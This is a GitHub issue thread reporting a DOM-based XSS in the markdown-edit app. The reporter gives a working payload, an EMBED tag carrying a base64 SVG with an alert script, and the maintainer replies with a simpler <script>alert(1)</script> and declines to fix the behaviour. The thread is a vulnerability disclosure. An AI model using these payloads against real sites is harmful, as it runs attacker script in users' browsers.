### ISSUE TITLE
dom-based XSS

### ISSUE THREAD

**Issue by anonym233** [georgeOsdDev/markdown-edit#12]
This label and attack vector will cause dom-based XSS.
if you type 
```
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
```
![xss](https://user-images.githubusercontent.com/22830917/62454463-f5ee4c80-b7a6-11e9-9caf-6a2670ae973d.PNG)

the XSS vulnerability will be triggered.

**Comment by georgeOsdDev** [comment]
We can reproduce XSS more simply.
`<script>alert(1)</script>`

Inline html is basically supported by markdown.
https://daringfireball.net/projects/markdown/syntax#html

This app just convert/render user input.
Please use this app with your own risk.
